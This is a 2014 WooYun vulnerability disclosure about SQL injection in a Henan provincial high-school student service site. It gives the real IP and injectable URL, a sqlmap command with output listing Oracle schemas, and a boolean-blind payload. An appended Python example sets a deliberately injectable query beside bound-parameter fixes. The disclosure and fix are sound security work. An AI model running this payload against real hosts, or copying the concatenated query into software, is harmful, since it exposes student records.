Vulnerability Summary

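Bug ID: wooyun-2014-064949

Title: SQL injection in a provincial high school student service platform

Vendor: Henan Provincial Department of Education

Author: Kuuki

Submitted: 2014-06-16 17:31

Fixed: 2014-07-31 17:32

Published: 2014-07-31 17:32

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (cncert, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]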


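Vulnerability Details

Disclosure status:

2014-06-16: Details reported to the vendor; awaiting vendor handling
2014-06-21: Vendor confirmed; details disclosed to the vendor only
2014-07-01: Details disclosed to core white hats and experts in related fields
2014-07-11: Details disclosed to regular white hats
2014-07-21: Details disclosed to trainee white hats
2014-07-31: Details disclosed to the public

Brief description:

....

Detailed description:

I happened to see a friend looking up academic proficiency test scores on this site,
so I ran a few simple tests...
Injection point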
“http://218.29.79.80/senior/policy/?type=02”

Proof of vulnerability:

C:\Users\H-Kuuki>sqlmap.py -u "http://218.29.79.80/senior/policy/?type=02" --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws. Developer
s assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:11:26
[21:11:26] [INFO] resuming back-end DBMS 'oracle'
[21:11:26] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: type
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=02' AND 6644=6644 AND 'GflB'='GflB
---
[21:11:27] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Oracle
[21:11:27] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart
to database names on other DBMSes
[21:11:27] [INFO] fetching database (schema) names
[21:11:27] [INFO] fetching number of databases
[21:11:27] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' fo
r faster data retrieval
[21:11:27] [INFO] retrieved:
[21:11:28] [WARNING] reflective value(s) found and filtering out
3
[21:11:33] [INFO] retrieved: SEMIS
[21:12:10] [INFO] retrieved: SYS
[21:12:34] [INFO] retrieved: SYSTEM
available databases [3]:
[*] SEMIS
[*] SYS
[*] SYSTEM
[21:13:18] [INFO] fetched data logged to text files under 'D:\sqlmap\output\218.29.79.80'
[*] shutting down at 21:13:18

Suggested fix:

Filter the input, quickly - -

Copyright notice: please credit the source when reposting: Kuuki@WooYun
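
Added example (not part of the original report and not the vendor's code): the injectable pattern behind the reported `type` parameter next to a bound-parameter version, exercised with the payload sqlmap printed above. An in-memory SQLite database stands in for Oracle, and the table, column and function names and the two-digit format check are assumptions.

```python
import re
import sqlite3

# Payload exactly as sqlmap printed it in the report above.
REPORTED_PAYLOAD = "02' AND 6644=6644 AND 'GflB'='GflB"
# Assumed format of a legitimate value, inferred from "type=02" in the URL.
TYPE_CODE = re.compile(r"[0-9]{2}")


def make_db():
    """Constructed sample table; the real SEMIS schema is not on the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE policy (type_code TEXT, title TEXT)")
    db.executemany(
        "INSERT INTO policy VALUES (?, ?)",
        [("01", "Enrollment notice"), ("02", "Exam policy"),
         ("02", "Score lookup guide")],
    )
    return db


def lookup_concatenated(db, type_value):
    """Vulnerable form: the request value is spliced into the SQL text."""
    sql = ("SELECT title FROM policy WHERE type_code = '" + type_value
           + "' ORDER BY title")
    return [row[0] for row in db.execute(sql)]


def lookup_bound(db, type_value):
    """Hardened form: the value is a bind variable and is never parsed as SQL."""
    sql = "SELECT title FROM policy WHERE type_code = ? ORDER BY title"
    return [row[0] for row in db.execute(sql, (type_value,))]


def lookup_validated(db, type_value):
    """Defense in depth: reject anything that is not a two-digit code first."""
    if not TYPE_CODE.fullmatch(type_value):
        raise ValueError("invalid type parameter")
    return lookup_bound(db, type_value)


if __name__ == "__main__":
    db = make_db()
    # Concatenation: the quote ends the literal, the rest runs as a predicate.
    print(lookup_concatenated(db, REPORTED_PAYLOAD))
    # Binding: the whole string is compared as data, so nothing matches.
    print(lookup_bound(db, REPORTED_PAYLOAD))
```

On the stack sqlmap identified (ASP.NET with Oracle), the equivalent of `lookup_bound` is a command that uses bind variables instead of string-built SQL.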


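Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2014-06-21 12:49

Vendor reply:

CNVD confirmed and reproduced the situation described. It has been passed down by CNCERT to the Qinghai branch center, which will follow up with the organization managing the site for handling. Scored by information-disclosure risk, rank 12.

Latest status:

None yet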